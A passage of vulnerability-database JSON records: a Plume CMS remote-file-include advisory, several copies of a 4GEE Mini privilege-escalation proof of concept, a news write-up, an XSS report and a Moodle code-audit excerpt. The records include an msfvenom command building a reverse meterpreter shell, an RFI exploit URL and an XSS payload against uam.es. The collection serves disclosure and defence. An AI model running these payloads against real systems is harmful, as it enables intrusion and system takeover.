{"id": "SECURITYVULNS:DOC:14327", "bulletinFamily": "software", "title": "Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability", "description": "Vendor: Plume CMS 1.1.10\r\nFound By : D3nGeR\r\nScripit Site : http://plume-cms.net\r\n\r\nin file [prepend.php]\r\n\r\n;\r\ninclude_once $_PX_config['manager_path'].'/inc/class.config.php'\r\n\r\ncode\r\nhttp://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]", "published": "2006-09-19T00:00:00", "modified": "2006-09-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14327", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "079de03f9f826f618cc53bc143b62682"}, {"key": "href", "hash": "963530814d7d89a686f427724d2678c1"}, {"key": "modified", "hash": "0ef402baca9df3aceb5c351585aaa46e"}, {"key": "published", "hash": "0ef402baca9df3aceb5c351585aaa46e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "09f025683dbc2379f3df968cbd150f8d"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b899ac5eb63be0ef89d39e9be926325a20a9529d23733ccf1c72236b2bf07c34", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:19"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": []}

{"exploitdb": [{"lastseen": "2018-10-07T14:36:10", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation. CVE-2018-14327. Local exploit for Windows platform", "reporter": "Exploit-DB", "published": "2018-09-27T00:00:00", "type": "exploitdb", "title": "EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation", "enchantments": {"score": {"modified": "2018-10-07T14:36:10", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2018-09-27T00:00:00", "id": "EDB-ID:45501", "href": "https://www.exploit-db.com/exploits/45501/", "sourceData": "# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation \r\n# Date: 2018-09-22\r\n# Software Version: EE40_00_02.00_44\r\n# Tested on: Windows 10 64-bit and Windows 7 64-bit\r\n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html\r\n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/\r\n# CVE: CVE-2018-14327\r\n# References\r\n# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/\r\n# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html\r\n\r\n# PoC\r\n\r\nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\"\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n\r\n\r\n# Weak Folder Permissions\r\n\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\r\nEE40 Everyone:(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n \r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService\r\nEE40\\BackgroundService Everyone:(OI)(CI)(F)\r\n Everyone:(I)(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\n# Example Payload\r\n\r\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45501/"}], "cve": [{"lastseen": "2018-09-30T10:26:07", "references": ["http://www.securityfocus.com/bid/105385", "http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html", "https://www.exploit-db.com/exploits/45501/", "http://packetstormsecurity.com/files/149492/EE-4GEE-Mini-Local-Privilege-Escalation.html", "https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/"], "description": "The installer for the Alcatel OSPREY3_MINI Modem component on EE EE40VB 4G mobile broadband modems with firmware before EE40_00_02.00_45 sets weak permissions (Everyone:Full Control) for the \"Web Connecton\\EE40\" and \"Web Connecton\\EE40\\BackgroundService\" directories, which allows local users to gain privileges, as demonstrated by inserting a Trojan horse ServiceManager.exe file into the \"Web Connecton\\EE40\\BackgroundService\" directory.", "edition": 2, "reporter": "NVD", "published": "2018-09-26T18:29:00", "title": "CVE-2018-14327", "type": "cve", "enchantments": {"score": {"modified": "2018-09-30T10:26:07", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-14327"], "scanner": [], "modified": "2018-09-29T06:29:03", "cpe": [], "id": "CVE-2018-14327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14327", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-09T11:54:25", "references": ["https://extremeportal.force.com/ExtrArticleDetail?n=000017719"], "description": "Extreme EXOS 16.x, 21.x, and 22.x allows administrators to read arbitrary files.", "edition": 2, "reporter": "NVD", "published": "2017-10-23T04:29:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "cve", "title": "CVE-2017-14327", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-14327"], "scanner": [], "modified": "2017-11-08T09:40:47", "cpe": ["cpe:/o:extremenetworks:extremexos:16.2", "cpe:/o:extremenetworks:extremexos:22.1", "cpe:/o:extremenetworks:extremexos:16.1.2", "cpe:/o:extremenetworks:extremexos:21.1.2", "cpe:/o:extremenetworks:extremexos:21.1.3", "cpe:/o:extremenetworks:extremexos:21.1", "cpe:/o:extremenetworks:extremexos:16.1.4", "cpe:/o:extremenetworks:extremexos:21.1.4", "cpe:/o:extremenetworks:extremexos:21.1.1", "cpe:/o:extremenetworks:extremexos:22.3", "cpe:/o:extremenetworks:extremexos:22.2", "cpe:/o:extremenetworks:extremexos:16.2.3", "cpe:/o:extremenetworks:extremexos:16.2.4", "cpe:/o:extremenetworks:extremexos:16.2.2", "cpe:/o:extremenetworks:extremexos:22.4", "cpe:/o:extremenetworks:extremexos:16.1.3"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14327", "id": "CVE-2017-14327", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2018-09-25T10:08:56", "references": [], "description": "", "edition": 1, "reporter": "Osanda Malith", "published": "2018-09-25T00:00:00", "title": "EE 4GEE Mini Local Privilege Escalation", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-09-25T10:08:56", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-25T00:00:00", "id": "PACKETSTORM:149492", "href": "https://packetstormsecurity.com/files/149492/EE-4GEE-Mini-Local-Privilege-Escalation.html", "sourceData": "`# Title: EE 4GEE Mini Local Privilege Escalation Vulnerability \n# Date: 22-09-2018 \n# Software Version: EE40_00_02.00_44 \n# Tested on: Windows 10 64-bit and Windows 7 64-bit \n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) \n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html \n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/ \n# CVE: CVE-2018-14327 \n \nUnquoted Service Path Vulnerability \n----------------------------------- \n \nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\" \n[SC] QueryServiceConfig SUCCESS \n \nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper \nTYPE : 110 WIN32_OWN_PROCESS (interactive) \nSTART_TYPE : 2 AUTO_START \nERROR_CONTROL : 1 NORMAL \nBINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start \nLOAD_ORDER_GROUP : \nTAG : 0 \nDISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper \nDEPENDENCIES : \nSERVICE_START_NAME : LocalSystem \n \n \nWeak Folder Permissions \n------------------------ \n \nC:\\Program Files (x86)\\Web Connecton>icacls EE40 \nEE40 Everyone:(OI)(CI)(F) \nNT SERVICE\\TrustedInstaller:(I)(F) \nNT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Administrators:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Users:(I)(RX) \nBUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE) \nCREATOR OWNER:(I)(OI)(CI)(IO)(F) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nC:\\Program Files (x86)\\Web Connecton> \nC:\\Program Files (x86)\\Web Connecton> \nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService \nEE40\\BackgroundService Everyone:(OI)(CI)(F) \nEveryone:(I)(OI)(CI)(F) \nNT SERVICE\\TrustedInstaller:(I)(F) \nNT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Administrators:(I)(OI)(CI)(IO)(F) \nBUILTIN\\Users:(I)(RX) \nBUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE) \nCREATOR OWNER:(I)(OI)(CI)(IO)(F) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) \nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nDisclosure Timeline \n--------------------- \n05-07-2018: The ZeroDayLab Consultant (Osanda Malith Jayathissa), reported the issue to EE via twitter \n05-07-2018: Reported to Alcatel via email. \n12-07-2018: Osanda Malith Jayathissa contacted MITRE. \n16-07-2018: CVE assigned CVE-2018-14327. \n25-07-2018: EE contacted Osanda Malith Jayathissa via email for more technical details. \n26-07-2018: Phone call between Osanda Malith Jayathissa and EE to discuss the vulnerability further. \n26-07-2018: EE confirms that patch will go live within one week. \n03-08-2018: Osanda Malith Jayathissa contacted EE for an update on the patch and EE stated that they will respond with more information by Friday 10th of August. \n10-08-2018: EE said that patch had been delayed and will notify Osanda Malith Jayathissa with an update. \n23-08-2018: EE replies with a patch update for Osanda Malith Jayathissa to verify. The ZeroDayLab Consultant confirmed the patch was working successfully. \n03-09-2018: EE notified Osanda Malith Jayathissa saying the patch was released. \n \nReferences \n----------- \nhttps://www.theregister.co.uk/2018/09/19/ee_modem_vuln/ \nhttps://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149492/ee4gee-escalate.txt"}], "zdt": [{"lastseen": "2018-09-25T16:11:16", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 1, "reporter": "Osanda Malith", "published": "2018-09-25T00:00:00", "title": "EE 4GEE Mini Local Privilege Escalation Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-09-25T16:11:16", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14327"], "modified": "2018-09-25T00:00:00", "id": "1337DAY-ID-31166", "href": "https://0day.today/exploit/description/31166", "sourceData": "# Title: EE 4GEE Mini Local Privilege Escalation Vulnerability \r\n# Software Version: EE40_00_02.00_44\r\n# Tested on: Windows 10 64-bit and Windows 7 64-bit\r\n# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html\r\n# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/\r\n# CVE: CVE-2018-14327 \r\n\r\nUnquoted Service Path Vulnerability\r\n-----------------------------------\r\n\r\nC:\\>sc qc \"Alcatel OSPREY3_MINI Modem Device Helper\"\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\Web Connecton\\EE40\\BackgroundService\\ServiceManager.exe -start\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n\r\n\r\nWeak Folder Permissions\r\n------------------------\r\n\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\r\nEE40 Everyone:(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n \r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>\r\nC:\\Program Files (x86)\\Web Connecton>icacls EE40\\BackgroundService\r\nEE40\\BackgroundService Everyone:(OI)(CI)(F)\r\n Everyone:(I)(OI)(CI)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(F)\r\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\r\n BUILTIN\\Users:(I)(RX)\r\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\r\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\r\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)\r\n \r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nDisclosure Timeline\r\n---------------------\r\n05-07-2018: The ZeroDayLab Consultant (Osanda Malith Jayathissa), reported the issue to EE via twitter\r\n05-07-2018: Reported to Alcatel via email.\r\n12-07-2018: Osanda Malith Jayathissa contacted MITRE.\r\n16-07-2018: CVE assigned CVE-2018-14327.\r\n25-07-2018: EE contacted Osanda Malith Jayathissa via email for more technical details.\r\n26-07-2018: Phone call between Osanda Malith Jayathissa and EE to discuss the vulnerability further.\r\n26-07-2018: EE confirms that patch will go live within one week.\r\n03-08-2018: Osanda Malith Jayathissa contacted EE for an update on the patch and EE stated that they will respond with more information by Friday 10th of August.\r\n10-08-2018: EE said that patch had been delayed and will notify Osanda Malith Jayathissa with an update.\r\n23-08-2018: EE replies with a patch update for Osanda Malith Jayathissa to verify. The ZeroDayLab Consultant confirmed the patch was working successfully.\r\n03-09-2018: EE notified Osanda Malith Jayathissa saying the patch was released.\r\n\r\nReferences\r\n-----------\r\nhttps://www.theregister.co.uk/2018/09/19/ee_modem_vuln/\r\nhttps://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html\n\n# 0day.today [2018-09-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31166"}], "thn": [{"lastseen": "2018-09-21T09:59:12", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-65YYEpMj4nY/W6SuDTxkjeI/AAAAAAAAyLY/s7ebAQDcL6QcUtm14o8DIXGozH00KxIGACLcBGAs/s728-e100/4g-ee-wifi-modem-hack.jpg>)\n\nA high-severity vulnerability has been discovered in 4G-based wireless 4GEE Mini modem sold by mobile operator EE that could allow an attacker to run a malicious program on a targeted computer with the highest level of privileges in the system. \n \nThe vulnerability\u2014discovered by 20-year-old **Osanda Malith**, a Sri Lankan security researcher at ZeroDayLab\u2014can be exploited by a low privileged user account to escalate privileges on any Windows computer that had once connected to the EE Mini modem via USB. \n \nThis, in turn, would allow an attacker to gain full system access to the targeted remote computer and thereby, perform any malicious actions, such as installing malware, rootkits, keylogger, or stealing personal information. \n\n\n \n4G Mini WiFi modem is manufactured by Alcatel and sold by EE, a mobile operator owned by BT Group\u2014 Britain's largest digital communications company that serves over 31 million connections across its mobile, fixed and wholesale networks. \n \n\n\n### How Does the Attack Work?\n\n \nThe local privilege escalation flaw, tracked as CVE-2018-14327, resides in the driver files installed by EE 4G Mini WiFi modem on a Windows system and originates because of folder permissions, allowing any low privileged user to \"read, write, execute, create, delete do anything inside that folder and it's subfolders.\" \n \nFor successful exploitation of the vulnerability, all an attacker or malware just needs to do is replace \"ServiceManager.exe\" file from the driver folder with a malicious file to trick the vulnerable driver into executing it with higher SYSTEM privileges after reboot. \n\n\nMalith also posted a video demonstration showing that how attackers can exploit this flaw to escalate their privileges on a Windows machine to gain a reverse shell. \n\n\n> \"An attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as \"NT AUTHORITY\\SYSTEM\" by giving the attacker full system access to the remote PC,\" he [explains](<https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/>) in his blog.\n\n \n\n\n### Patch Your 4G Wi-Fi Mini Modems\n\n \nThe researcher reported the vulnerability to EE and Alcatel in July, and the company acknowledged the issue and rolled out a firmware patch earlier this month to address the vulnerability. \n\n\n \nIf you own a G-based wireless 4GEE Mini modem from EE, you are advised to update the firmware modem to the latest \"EE40_00_02.00_45\" version and remove previous vulnerable versions. \n\n\n[](<https://1.bp.blogspot.com/-qqWBi9h-tdw/W6SvEHN04kI/AAAAAAAAyLg/AnPK13sfKMQxOQWQ0Cj9tdq_iKWeyjvGgCLcBGAs/s728-e100/4g-ee-wifi-modem-hack.jpg>)\n\nFollow these simple steps to update your 4GEE Mini modem to the latest patch update: \n\n\n * Go to your router's default gateway: http://192.168.1.1.\n * Click on the \"Check for Update\" to update your firmware.\n * Once updated to the patched software version EE40_00_02.00_45, remove the previously installed software version from your computer.\nFor more details on the vulnerability, you can head on to [Malith's blog](<https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/>), and the detailed [advisory](<http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html>) released by ZeroDayLab.\n", "reporter": "The Hacker News", "published": "2018-09-21T08:45:00", "type": "thn", "title": "Flaw in 4GEE WiFi Modem Could Leave Your Computer Vulnerable", "enchantments": {"score": {"modified": "2018-09-21T09:59:12", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2018-14327"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-09-21T08:45:25", "id": "THN:20C9FC0CFE440CBA16ACA69BAA89C8FF", "href": "https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "openbugbounty": [{"lastseen": "2017-10-17T00:17:41", "_object_types": ["robots.models.openbugbounty.OpenbugbountyBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "openbugbounty": {"mirror": "", "patchStatus": "unpatched"}, "description": "##### Vulnerable URL:\n \n \n http://uam.es/UAM/BuscadorGeneral/1446725958936.htm?language=es%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%28%2FOPENBUGBOUNTY%2F%29%3C%2Fscript%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 28.07.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 14327 \nVIP website status:| Yes \nCheck uam.es SSL connection:| (Grade: B+) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 16 April, 2017 00:38 GMT \nNotification sent to subscribers (without technical details)| 16 April, 2017 02:17 GMT \nGeneric security notifications sent to website owner| 27 May, 2017 03:30 GMT \nVulnerability details disclosed by researcher| 9 July, 2017 01:15 GMT\n", "reporter": "porthunter", "published": "2017-04-16T00:38:00", "type": "openbugbounty", "title": "uam.es XSS vulnerability ", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "bugbounty", "cvelist": [], "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "modified": "2017-07-09T01:15:00", "href": "https://www.openbugbounty.org/reports/225270/", "id": "OBB:225270", "cvss": {"score": 0.0, "vector": "NONE"}}], "appercut": [{"lastseen": "2016-09-06T17:45:29", "references": ["https://download.moodle.org/releases/latest/"], "description": "Several vulnerabilities were discovered in Moodle 'Moodle' software:\nFile System Path Manipulation\nIncorrect User Input Filtration when Using the unserialize Function\nIncorrect Newline Symbol Filtration in HTTP-response Headers\nUsing Insufficiently Random Generators in Cryptography\nHttpOnly Cookies\nIncorrect User Input Filtration during SQL Request Generations\n\u00a0 Incorrect Permissions for External Entities During XML Document Processing\nIncorrect User Input Filtration when Generating Code on the Fly\nUsing Obsolete jQuery Methods\nRedirecting the User to a Malicious Site\nUsing Insufficiently Random Generators in Cryptography", "edition": 1, "reporter": "InfoWatch APPERCUT", "published": "2016-07-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "appercut", "title": "Moodle: source code security analysis report", "bulletinFamily": "software", "affectedSoftware": [{"name": "Moodle", "version": "3.1.1", "operator": "le"}], "cvelist": [], "modified": "2016-08-31T00:00:00", "id": "APPERCUT:24", "appercut": {"reportPages": [{"pageNumber": 19, "vulnerabilities": [{"sourceFileName": "moodle/question/type/ddmarker/yui/src/ddmarker/js/ddmarker.js", "code": " */\nY.extend(DDMARKER_QUESTION, M.qtype_ddmarker.dd_base_class, {\n touchscrolldisable: null,\n pendingid: '',\n initializer : function() {\n this.pendingid = 'qtype_ddmarker-' + Math.random().toString(36).slice(2); // Random string.\n M.util.js_pending(this.pendingid);\n this.doc = this.doc_structure(this);\n this.poll_for_image_load(null, false, 0, this.after_image_load);\n this.doc.bg_img().after('load', this.poll_for_image_load, this,\n false, 0, this.after_image_load);\n", "vulnerId": "APPCUT:62:14589", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 56, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 314, "positionInEndLine": 58, "startLineNumber": 314, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/moodlelib.php", "code": "\n if (empty($CFG->passwordpolicy)) {\n $fillers = PASSWORD_DIGITS;\n $wordlist = file($CFG->wordlist);\n $word1 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $word2 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $filler1 = $fillers[rand(0, strlen($fillers) - 1)];\n $password = $word1 . $filler1 . $word2;\n } else {\n $minlen = !empty($CFG->minpasswordlength) ? $CFG->minpasswordlength : 0;\n $digits = $CFG->minpassworddigits;\n", "vulnerId": "APPCUT:62:14551", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 32, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 7995, "positionInEndLine": 61, "startLineNumber": 7995, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/ddimageortext/yui/build/moodle-qtype_ddimageortext-form/moodle-qtype_ddimageortext-form-debug.js", "code": "Y.extend(DDIMAGEORTEXT_FORM, M.qtype_ddimageortext.dd_base_class, {\n pendingid: '',\n fp : null,\n\n initializer : function() {\n this.pendingid = 